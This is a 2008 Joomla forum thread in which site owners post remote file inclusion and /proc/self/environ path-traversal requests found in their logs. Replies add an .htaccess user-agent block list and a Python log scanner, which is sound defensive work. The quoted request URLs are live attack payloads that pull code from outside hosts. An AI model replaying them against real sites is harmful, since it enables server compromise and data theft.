A collection of strange links on my Joomla site

Posted: Mon Aug 11, 2008 12:57 am
by ased
Hi,

I found this in my site and I wonder what's going on. I'm using MyBlog from azrul as the front page; when I put these links in the browser they took me to my front page, but there are links to other sites!
How did they do it?
How do I delete it and avoid it in the future?

Thanks for your help

The links :

mysite.com/index.php?view=page&pagename=http://www.yavuzselimlisesi.com/compone ... age/id.txt???

mysite.com/index.php?view=page&pagename=http://student-x.com/test.txt?

.mysite.com/index.php?autoLoadConfig[333][0][autoType]=include&autoLoadConfig[333][0][loadFile]=http://hortus-alere.dyndns.org/Home/com ... e/test.txt???

mysite.com/index.php?view=page&pagename=http://www.mubune.com/plugins/safehtml/oye.txt??

Re: hack attempt

Posted: Mon Sep 15, 2008 2:15 am
by wildazzjw
I also have this activity in my logs. A Google search vaguely shows this as some sort of hack. Maybe for ZenCart? Not sure I'm able to tell if anything was exploited. Does this work on Joomla?

//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00

//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ

Re: A collection of strange links on my Joomla site

Posted: Mon Sep 15, 2008 2:31 am
by mandville
it MIGHT do, but my guess is it was being called using the libwww bot. ban that in your htaccess and it should dramatically clear up these types of attacks

Re: A collection of strange links on my Joomla site

Posted: Mon Sep 29, 2008 10:33 am
by Jane Blonde
How do I ban that? What is the exact code?

Code:

SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot

That's what I found with Google, but is that it?

Should we ban other stuff too?

J

Re: A collection of strange links on my Joomla site

Posted: Mon Sep 29, 2008 11:12 am
by mandville
that's basically correct. if you search this forum, especially some of my posts, you will see the htaccess code i use to ban this and other bad bots

Re: A collection of strange links on my Joomla site

Posted: Mon Sep 29, 2008 10:09 pm
by mandville
this is the sort of full htaccess code i meant, adapt to your own use.

Code:

# Tag any request whose User-Agent starts with one of these strings
SetEnvIfNoCase User-Agent "^FlashGet" bad_bot
SetEnvIfNoCase User-Agent "^GetRight" bad_bot
SetEnvIfNoCase User-Agent "^GetWeb!" bad_bot
SetEnvIfNoCase User-Agent "^Go!Zilla" bad_bot
SetEnvIfNoCase User-Agent "^httplib" bad_bot
SetEnvIfNoCase User-Agent "^Indy Library" bad_bot
SetEnvIfNoCase User-Agent "^InfoNaviRobot" bad_bot
SetEnvIfNoCase User-Agent "^InterGET" bad_bot
SetEnvIfNoCase User-Agent "^Internet Ninja" bad_bot
SetEnvIfNoCase User-Agent "^LexiBot" bad_bot
SetEnvIfNoCase User-Agent "^libWeb/clsHTTP" bad_bot
SetEnvIfNoCase User-Agent "^libwww" bad_bot
SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot
SetEnvIfNoCase User-Agent "^LinkextractorPro" bad_bot
SetEnvIfNoCase User-Agent "^Mozilla.*NEWT" bad_bot
SetEnvIfNoCase User-Agent "^Octopus" bad_bot
SetEnvIfNoCase User-Agent "^ProWebWalker" bad_bot
SetEnvIfNoCase User-Agent "^SuperBot" bad_bot
SetEnvIfNoCase User-Agent "^WebAuto" bad_bot
SetEnvIfNoCase User-Agent "^Wells Search II" bad_bot
SetEnvIfNoCase User-Agent "^Wget" bad_bot
SetEnvIfNoCase User-Agent "^wget" bad_bot
# Refuse GET and POST from tagged clients (Apache 2.2 Order/Allow/Deny syntax)
<Limit GET POST>
order allow,deny
allow from all
deny from env=bad_bot
</Limit>

Re: A collection of strange links on my Joomla site

Posted: Tue Sep 30, 2008 10:42 am
by Jane Blonde
Wow! Now you're talking, that's great Mandivile, I feel a lot safer!

When I searched your posts for .htaccess I mostly got this one!

JB

Re: A collection of strange links on my Joomla site

Posted: Tue Sep 30, 2008 11:08 am
by mandville
NP - make sure mod_rewrite is on.
you will notice that a lot of libwww will start appearing in your logs marked "denied by server" or similar

Re: A collection of strange links on my Joomla site

Posted: Tue Sep 30, 2008 11:39 am
by Jane Blonde

Code:

RewriteEngine On

:)

Re: A collection of strange links on my Joomla site

Posted: Fri Oct 03, 2008 4:41 pm
by mandville
just thought i would check if this code has helped, and if not, have any other issues arisen?

Re: A collection of strange links on my Joomla site

Posted: Fri Oct 03, 2008 5:41 pm
by Jane Blonde
I have not had a problem since and am implementing it on other Joomla sites, thanks :)

Re: A collection of strange links on my Joomla site

Posted: Sat Nov 15, 2008 1:20 pm
by guysmiley
Greetings,

Thanks for this list ;)

If modsecurity is already catching it, am I burdening the server unnecessarily by adding these lines to my .htaccess?

IOW, should I add these lines to .htaccess if modsecurity is already nabbing them?

Thanks!
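
Added example, not part of the original thread or any poster's code: a small Python scanner that flags the request shapes quoted in the posts above (a full URL passed as a parameter value, or a `../` traversal to `/proc/self/environ` with a trailing `%00`) in Apache combined-format access logs, whatever User-Agent the client sent. The log lines, IP addresses, and the host `remote.example` are constructed samples; the function and reason names are this example's own.

```python
import re
from urllib.parse import parse_qsl, unquote

# Apache combined log format: capture the request target and the User-Agent.
LOG_RE = re.compile(
    r'"(?:GET|POST|HEAD) (?P<target>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')
REMOTE_URL = re.compile(r'^\s*(?:https?|ftp)://', re.I)  # value is a full URL
TRAVERSAL = re.compile(r'(?:\.\./){2,}')                  # repeated ../ segments
LOCAL_TARGETS = ('/proc/self/environ', '/etc/passwd')

def classify(target):
    """Return (parameter, reason) findings for one request target."""
    findings = []
    query = target.partition('?')[2]
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote(value)  # second decode catches double-encoded values
        if REMOTE_URL.match(value):
            findings.append((name, 'remote-url-in-parameter'))
        elif TRAVERSAL.search(value) or any(t in value for t in LOCAL_TARGETS):
            findings.append((name, 'path-traversal'))
        if '\x00' in value:
            findings.append((name, 'null-byte'))
    return findings

def scan(lines):
    """Return (user_agent, target, findings) for each suspicious log line."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if m:
            findings = classify(m.group('target'))
            if findings:
                hits.append((m.group('ua'), m.group('target'), findings))
    return hits

# Constructed sample lines (documentation IPs, placeholder host remote.example).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Sep/2008:02:10:01 +0000] "GET /index.php?view=page'
    '&pagename=http://remote.example/test.txt? HTTP/1.1" 200 5120 "-" "libwww-perl/5.808"',
    '198.51.100.7 - - [15/Sep/2008:02:11:40 +0000] "GET //index.php?'
    'autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]='
    '../../../../proc/self/environ%00 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux)"',
    '203.0.113.5 - - [15/Sep/2008:02:12:03 +0000] "GET /index.php?option=com_content'
    '&view=article&id=5 HTTP/1.1" 200 8000 "-" "Mozilla/5.0 (Windows)"',
]

if __name__ == '__main__':
    for ua, target, findings in scan(SAMPLE_LOG):
        print(ua, findings, target[:60])
```

A parameter that legitimately carries a URL (a return or redirect address, for instance) will also be reported as `remote-url-in-parameter`, so review hits against what the application actually expects in that parameter.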